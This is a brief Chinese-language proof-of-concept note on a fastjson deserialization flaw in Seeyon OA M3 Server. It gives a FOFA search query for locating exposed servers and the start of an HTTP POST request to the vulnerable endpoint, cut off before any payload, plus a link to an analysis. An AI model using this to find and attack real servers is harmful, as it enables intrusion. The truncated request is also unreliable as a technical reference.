POC00/致远OA M3 Server 反序列化漏洞.md

致远OA M3 Server 反序列化漏洞

fofa

"M3-Server 已启动"

根据群友说，这个漏洞是fastjson反序列化

poc

POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencod

##漏洞分析

https://mp.weixin.qq.com/s/czbhaf7jpNmgjAt-OFWmIA